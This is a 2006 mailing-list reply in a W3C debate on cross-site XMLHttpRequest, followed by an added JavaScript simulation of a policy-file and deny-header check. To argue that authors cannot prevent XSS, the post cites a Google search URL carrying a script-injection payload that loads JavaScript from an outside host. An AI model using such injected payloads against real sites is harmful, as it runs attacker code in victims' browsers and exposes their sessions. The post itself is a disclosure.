Re: (XMLHttpRequest 2) Proposal for cross-site extensions to XMLHttpRequest

"Ian Hickson" <ian@hixie.ch>
> - Caching means they can't be updated quickly for patching security
>   holes, especially on large sites (which ironically are the most
>   likely to be targeted).

A single location, with a NOT CROSS DOMAIN header available on individual 
URIs, is workable: you've got the single location to stop inadvertent 
leakage, and the ability for a server to rapidly deny specific requests to 
specific URIs.

I fail to see how a magic URI pollutes logs any more than any other 
request - the only time you'd get a request for one that wasn't available is 
if someone was using a resource they weren't allowed to use. The request for 
the real resource would be equally polluting for the logs, except that an 
author would no longer have accurate statistics [1] - how does the server 
tell a successful request from one that was swallowed by the client?  It 
would also have the advantage that a server that didn't understand the XHR 
rules wouldn't be forced to execute a lengthy process and return a large 
document only to have it discarded by the client.

Personally I think the WEB-API WG should not even be considering a Cross 
Domain XHR at this time. It's clear from examples such as

http://mail.google.com/search?hl=en&lr=&rls=GGLD%2CGGLD%3A2003-47%2CGGLD%3Aen&q=%3Cscript+src%3D%22http%3A%2F%2Fjibbering.com%2Ftest6.js%22%3EOR+%3Cscript%3Ebooks%3C%2Fscript%3E

that not even companies with the resources of Google can protect their 
flagship domains and services from XSS exploits (the above one has been 
public for over a week and not patched at time of posting), so the 
assumptions about the capability of authors shown in the discussion are probably 
unwarranted.   There are higher-priority things to be finishing - test 
suites for the current specs.

Also, once again, the first discussion on the list is a specification; where 
are the use cases?  Please provide use cases for all new functionality before 
proposing a solution; it's silly to waste everyone's time reviewing 
specifications when the use case for the spec. is not known.  Also, the 
webapi WG has expressed a public preference to specify existing behaviour; 
there are existing solutions to the cross-domain problem, and a criticism of 
these solutions would be welcome before suggesting yet another method.

Cheers,

Jim.


[1] Not that they did before, but it's now even more unreliable, as even the 
successful requests aren't an accurate count, since failures exist only on the 
client.

Received on Tuesday, 11 April 2006 21:23:30 UTC
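The two-layer check Jim sketches above (a single policy location on the target host, plus a per-URI header that lets a server withdraw one resource quickly), as an added example that is not part of the post or of any shipped specification. The policy path "/xd-policy.txt", its one-prefix-per-line format, and the "X-Not-Cross-Domain" header name are assumptions made for this illustration; the in-memory server and its routes are constructed sample data. The server keeps a request log so you can see which layer stops a request and what reaches the server's logs.

```javascript
// Added example, not code from the mailing-list post. Models a single-location
// policy file plus a per-URI opt-out header, as described in the post.
// ASSUMPTIONS: POLICY_PATH, the policy format and DENY_HEADER are hypothetical.

// Constructed in-memory origin server: path -> response. Every request is
// appended to `log`, so the effect on server logs can be inspected.
function makeServer(routes) {
  const log = [];
  return {
    log,
    get(path) {
      log.push(path);
      const r = routes[path];
      if (!r) return { status: 404, headers: {}, body: "" };
      return { status: 200, headers: r.headers || {}, body: r.body };
    },
  };
}

const POLICY_PATH = "/xd-policy.txt";     // assumed single policy location
const DENY_HEADER = "x-not-cross-domain"; // assumed per-URI opt-out header

// Assumed policy format: one allowed path prefix per line, '#' starts a
// comment. Anything not listed is not readable cross-domain.
function parsePolicy(text) {
  return text.split("\n")
    .map(line => line.replace(/#.*/, "").trim())
    .filter(line => line.length > 0);
}

// Simulated cross-domain GET from another origin. Returns
// { ok: true, body } or { ok: false, reason }.
function crossDomainGet(server, path) {
  // Layer 1: the single location is fetched first. A host that never
  // publishes it has not opted in, which guards against inadvertent leakage.
  const pol = server.get(POLICY_PATH);
  if (pol.status !== 200) {
    return { ok: false, reason: "no policy file: host has not opted in" };
  }
  const allowed = parsePolicy(pol.body);
  if (!allowed.some(prefix => path.startsWith(prefix))) {
    // The real resource is never requested: the server does no work for it
    // and its log shows only the policy fetch.
    return { ok: false, reason: "not listed in policy" };
  }

  // Layer 2: the per-URI header is checked on the resource's own response,
  // so one URI can be withdrawn without touching the policy file.
  const res = server.get(path);
  if (res.status !== 200) {
    return { ok: false, reason: "resource returned status " + res.status };
  }
  const headers = Object.fromEntries(
    Object.entries(res.headers).map(([k, v]) => [k.toLowerCase(), v]));
  if (DENY_HEADER in headers) {
    return { ok: false, reason: "resource opted out via header" };
  }
  return { ok: true, body: res.body };
}

// Constructed sample host: one public prefix listed, one resource under that
// prefix withdrawn via the header, one private path never listed.
const sample = makeServer({
  [POLICY_PATH]:         { body: "# public API only\n/api/public/\n" },
  "/api/public/feed":    { body: "<feed/>" },
  "/api/public/retired": { body: "<secret/>", headers: { "X-Not-Cross-Domain": "1" } },
  "/api/private/mail":   { body: "<mail/>" },
});

for (const p of ["/api/public/feed", "/api/public/retired", "/api/private/mail"]) {
  console.log(p, JSON.stringify(crossDomainGet(sample, p)));
}
console.log("server log:", JSON.stringify(sample.log));
```

Run under Node. The log for the "/api/private/mail" case contains only the policy fetch, which is the point about not forcing a server to build a large document the client will discard; the "/api/public/retired" case shows the header denial happening after the resource was served, so that request does land in the log and in any statistics.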